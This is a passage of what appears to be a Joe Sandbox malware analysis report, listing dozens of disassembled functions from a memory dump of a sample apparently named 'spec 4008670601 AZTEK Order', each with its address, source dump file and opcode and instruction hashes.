                                                      • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                      • Instruction Fuzzy Hash: 83E09231010612DFE7766F6AC98CB56BEE4FF50711F148D2CE096524B4C7B599C1CA40
                                                      Function 01824000 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                      • Instruction ID: e06ea9830d410a6221d9ba2e998522d1637f374cf28af23fb2b96377bee58ba6
                                                      • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                      • Instruction Fuzzy Hash: 27E0C2343003158FE756CF1AC040B627BB6BFD5B10F28C069E9498F205EB36E982CB50
                                                      Function 017DCA38 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 135bad9fcd6c79a88319240c3948f79db14a44617d0900b2aae56349256c0883
                                                      • Instruction ID: 2a4505677adac8e7a33290899d9f4fa0984d6da115c3e8cdb6dd6823223a1a70
                                                      • Opcode Fuzzy Hash: 135bad9fcd6c79a88319240c3948f79db14a44617d0900b2aae56349256c0883
                                                      • Instruction Fuzzy Hash: 28D02B325D50206ACB37E1187C48FD3BB699B84720F0548A9F20896015D524CD81D6C4
                                                      Function 0179823B Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                      • Instruction ID: 1bb4bdcac4e43494fa7407a55394ece89c47937d59c0bca85f7ac36696606a54
                                                      • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                      • Instruction Fuzzy Hash: C9E0C232448A18EFDF322F25EC08F52F6E5FF59B10F2448AAE081070A987B4AC85CB45
                                                      Function 017A2050 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ebea108ca51ea3b62ef5591ec81876dd8be8d5e576653a94ce4f14eceab11783
                                                      • Instruction ID: 7aed5557f85ba1777f1269874bada073ed6049c3166e08e7d3dc7372485b492b
                                                      • Opcode Fuzzy Hash: ebea108ca51ea3b62ef5591ec81876dd8be8d5e576653a94ce4f14eceab11783
                                                      • Instruction Fuzzy Hash: 27E08C331004506BC212FB5DDD40F8AB39AEFA4360F540221F15187698CB60AD40C794
                                                      Function 017D8A90 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                      • Instruction ID: 77b8fc7a6c147e2021991f082656ccead0e8ce0fd2d17d79790db6ab50cb392d
                                                      • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                      • Instruction Fuzzy Hash: 59E08633111A1887C728DE18D511B72B7B4EF85720F09463EE61347780C534F544C796
                                                      Function 017F6AA4 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                      • Instruction ID: ef5d6f0c316aed914269733cce5ac67fca5d8029ccee880a6fcf430ba09e9e01
                                                      • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                      • Instruction Fuzzy Hash: D9D05E36511A50AFC3329F1BEA04D53FBF9FBC4A107050A2EE54583A24C770E846CBA0
                                                      Function 017DE59C Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                      • Instruction ID: 221b42aba18a17a0d9d3ae7225adc96f1305e8fc9743f9883184170e43de1768
                                                      • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                      • Instruction Fuzzy Hash: 2FD0A933604620ABD772AA1CFC04FC373E8BB88B20F060859F028C7098C360AC81CA84
                                                      Function 0181E908 Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                      • Instruction ID: b244326554d518e630d98b5cd5137e2242f0ed975101812a09cba5c77ef0d539
                                                      • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                      • Instruction Fuzzy Hash: 70E08C329406809BCF13DFA9C644F4AFBB9BB80B00F180044A4089B268C634A900CB40
                                                      Function 0179A0E3 Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction ID: 21676073d7471ab82e7aed028e3218282747178c0e1369c0a256abfe7796561a
                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction Fuzzy Hash: 20D0223221303193CF2856997844FA3E925EB81A90F1A006C740A93804C1148C82C2E0
                                                      Function 017DA830 Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                      • Instruction ID: 71b258fc9b9094e211567bd122376632dad8fc028bd2f2947db7a7e3b27dc897
                                                      • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                      • Instruction Fuzzy Hash: F2D012371D054DBBCB119FA6DC41F957BA9E764BA0F444420F514875A0C63AE990D584
                                                      Function 017DCA24 Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b9716e5a5b14fad8ad864cb63f3c9405bdc78d49fe454cefbe15430927decb5a
                                                      • Instruction ID: c2f7e6b47f14d994c3d4a152ae21ea588a4cd139a1e9d8ff16d080e5f406faa9
                                                      • Opcode Fuzzy Hash: b9716e5a5b14fad8ad864cb63f3c9405bdc78d49fe454cefbe15430927decb5a
                                                      • Instruction Fuzzy Hash: FBD0A731541005CBDF17CF88C551E6EB674FF60740B40006CE70091024E724FE01CA40
                                                      Function 017DC700 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction ID: 82e0d32256a920b3e4a60e205124c75b07efa6875cba199bef9a6659052dfc2c
                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction Fuzzy Hash: 58C01232290648AFC712AA99CD41F42BBA9EBA8B40F000421F2048B6B0C631E860EA84
                                                      Function 017C0310 Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                      • Instruction ID: 7447321bb6778e9e444c0817cc9a5cdf2cc239e4811c6ebb08c69263d02a5c73
                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                      • Instruction Fuzzy Hash: 15D01236100248EFCB01DF41C890D9AB72AFBD8B10F10801DFD19076108A31ED63DA90
                                                      Function 017A0750 Relevance: .0, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction ID: fe7c0f0ac1e1145a16aa1c0edc41b64d89218af9c0168b8833d191b63a4ec52a
                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction Fuzzy Hash: 0AC04C757015418FCF15DF19D6D4F45B7E4F744740F150890E905CB721E724E841CA10
                                                      Function 017E4340 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3625f8d5db97267820d3115a4a9be2ad6785899c92f3cb2304d4c3b07f5f8121
                                                      • Instruction ID: 6644c73e3fa28f8e4cb3bf586e6d65db0a26d17d2824564d2a231a11881101ff
                                                      • Opcode Fuzzy Hash: 3625f8d5db97267820d3115a4a9be2ad6785899c92f3cb2304d4c3b07f5f8121
                                                      • Instruction Fuzzy Hash: 9C900231609800129640725848845478005E7E1301B55C025E1424574CCB14CB6A5362
                                                      Function 017E4650 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 099121dfd00a68608b7b46c81c93abc10576e33c28ad7237d0ce00b6ba6be337
                                                      • Instruction ID: b291931a4e87a40471a9ecc4305c6f728e5fa3e5d4b47de65b12ec76c562859e
                                                      • Opcode Fuzzy Hash: 099121dfd00a68608b7b46c81c93abc10576e33c28ad7237d0ce00b6ba6be337
                                                      • Instruction Fuzzy Hash: 4990026160550042464072584804407A005E7E2301395C129A1554570CC718CA69936A
                                                      Function 017E2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16c7ac90fe1343e57c981dca993781e7d3055943be8d885d31e8a3f18430bedb
                                                      • Instruction ID: 6c44f5c5bf651923b49305e9fb44a8b91baabc4a1739790133fd8edd0fcfc4fd
                                                      • Opcode Fuzzy Hash: 16c7ac90fe1343e57c981dca993781e7d3055943be8d885d31e8a3f18430bedb
                                                      • Instruction Fuzzy Hash: 6190023120540802D6807258440464B4005D7D2301F95C029A1025674DCB15CB6D77A2
                                                      Function 017E2BE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ccd6f5adf7ca02485e813d7b512c777e8cacd0287ba305db04cbba12341fcd32
                                                      • Instruction ID: 7b1ba6754d4c9ee7960e785b3a3a4b0eb73771e98a04e6f7f10f45b0d8ac4b04
                                                      • Opcode Fuzzy Hash: ccd6f5adf7ca02485e813d7b512c777e8cacd0287ba305db04cbba12341fcd32
                                                      • Instruction Fuzzy Hash: 9290023120944842D64072584404A474015D7D1305F55C025A10646B4DD725CF69B762
                                                      Function 017E2BA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945589cfd30f504241c027f29658d30a075325852dd936988ce3509c489c24b9
                                                      • Instruction ID: 087dd9124830e8a1c4a5d9302d7d1a2d3cc7a6d8bcc504a49d59b6f64a263aca
                                                      • Opcode Fuzzy Hash: 945589cfd30f504241c027f29658d30a075325852dd936988ce3509c489c24b9
                                                      • Instruction Fuzzy Hash: 6C90023160940802D650725844147474005D7D1301F55C025A1024674DC755CB6977A2
                                                      Function 017E2B80 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e61c2a84b38940bfcd98bcf43778a84e57fd024beb8b6e2e567f23edeb32d26
                                                      • Instruction ID: 7fc8a785a75296ba99d360c0638f0dc041f30bd1febf5c0ff1ae08ac83b5e600
                                                      • Opcode Fuzzy Hash: 2e61c2a84b38940bfcd98bcf43778a84e57fd024beb8b6e2e567f23edeb32d26
                                                      • Instruction Fuzzy Hash: 7190023120540802D604725848046874005D7D1301F55C025A7024675ED765CAA57232
                                                      Function 017E2AF0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 040d252a758774bd52df40f0d32eac76b18d1022806777b465545bfed7045daa
                                                      • Instruction ID: c832d196e41a9951aaecbaafad7b9651a6469ddb13cf567fc6fd441ca621e374
                                                      • Opcode Fuzzy Hash: 040d252a758774bd52df40f0d32eac76b18d1022806777b465545bfed7045daa
                                                      • Instruction Fuzzy Hash: 9A900225225400020645B658060450B4445E7D7351395C029F24165B0CC721CA795322
                                                      Function 017E2AD0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ab7b6d6fe6a6fba33f0d4efdd410da52bb40a89ca3367f0afcf3404e0f3f3e3f
                                                      • Instruction ID: ca2ef29ed05e5a28a9142894a2deb963cefc1c507e1fdef0be8db907a2f877b9
                                                      • Opcode Fuzzy Hash: ab7b6d6fe6a6fba33f0d4efdd410da52bb40a89ca3367f0afcf3404e0f3f3e3f
                                                      • Instruction Fuzzy Hash: 5D900225215400030605B65807045074046D7D6351355C035F2015570CD721CA755222
                                                      Function 017E2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0b8202cf4e6ae777127fe48a59dd766fe47e3ef3ff27b72428769117c83d1c7
                                                      • Instruction ID: 39f898736abb3c8ac36f8f185b0d8b5313997ddfe245d2dd3b24bf2ad4288d22
                                                      • Opcode Fuzzy Hash: e0b8202cf4e6ae777127fe48a59dd766fe47e3ef3ff27b72428769117c83d1c7
                                                      • Instruction Fuzzy Hash: D99002A1205540924A00B3588404B0B8505D7E1201B55C02AE2054570CC625CA659236
                                                      Function 017E2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 654a72a869c784e80cb4d76bbc623e257ac8b492cc732e9667e48fa780b7a118
                                                      • Instruction ID: 50a82235597b351e2992b5d30f079a6bc7014ebe88bb28efa8f4beea9e501ba8
                                                      • Opcode Fuzzy Hash: 654a72a869c784e80cb4d76bbc623e257ac8b492cc732e9667e48fa780b7a118
                                                      • Instruction Fuzzy Hash: 5090022130540003D640725854186078005E7E2301F55D025E1414574CDA15CA6A5323
                                                      Function 017E2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b529869e3531b0e86a69a12f82021f15a1e36967fd2c8f6e4868fbb6d241d91d
                                                      • Instruction ID: ebff6c630a43aa281a827125bb8981e0712b2e54e7ac38fb2bab17018018985c
                                                      • Opcode Fuzzy Hash: b529869e3531b0e86a69a12f82021f15a1e36967fd2c8f6e4868fbb6d241d91d
                                                      • Instruction Fuzzy Hash: CC90022921740002D6807258540860B4005D7D2202F95D429A1015578CCA15CA7D5322
                                                      Function 017E2D00 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                      • Instruction ID: 542fa46c1c09bdf752870486bb3e02cb083f04796fe813daf2275f8fc1d2d118
                                                      • Opcode Fuzzy Hash: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                      • Instruction Fuzzy Hash: 1F90022120944442D60076585408A074005D7D1205F55D025A20645B5DC735CA65A232
                                                      Function 017E2DD0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                      • Instruction ID: 65921516359d62f8d5d3d0be205e1e26da0dc8636cbae108dd6a7fa2482c6dfb
                                                      • Opcode Fuzzy Hash: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                      • Instruction Fuzzy Hash: 04900221246441525A45B25844045078006E7E1241795C026A2414970CC626DA6AD722
                                                      Function 017E2DB0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                      • Instruction ID: 8444e8c5c073f08537f5feee0e5ad5f02bc349f8d6c074850bdbcaa0278670ac
                                                      • Opcode Fuzzy Hash: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                      • Instruction Fuzzy Hash: 5990023124540402D641725844046074009E7D1241F95C026A1424574EC755CB6AAB62
                                                      Function 017E2C60 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                      • Instruction ID: 46c990dd8ed61010dd6670d268d27b14a518f24a921ec6edbfbf1a7cb9b8fd13
                                                      • Opcode Fuzzy Hash: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                      • Instruction Fuzzy Hash: 2490023120540842D60072584404B474005D7E1301F55C02AA1124674DC715CA657622
                                                      Function 017E2CF0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                      • Instruction ID: 517ad7e89975005f97a2a8a5e667bc5ea15cb1d4b5e75f3dc0b28dd1704168f0
                                                      • Opcode Fuzzy Hash: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                      • Instruction Fuzzy Hash: 7D90023120540403D600725855087074005D7D1201F55D425A1424578DD756CA656222
                                                      Function 017E2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                      • Instruction ID: 79336149b241350bb2d54b870bdcfdbd48e0d8f5ee45252b92eba27cbca614a1
                                                      • Opcode Fuzzy Hash: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                      • Instruction Fuzzy Hash: A690022160940402D640725854187074015D7D1201F55D025A1024574DC759CB6967A2
                                                      Function 017E2CA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
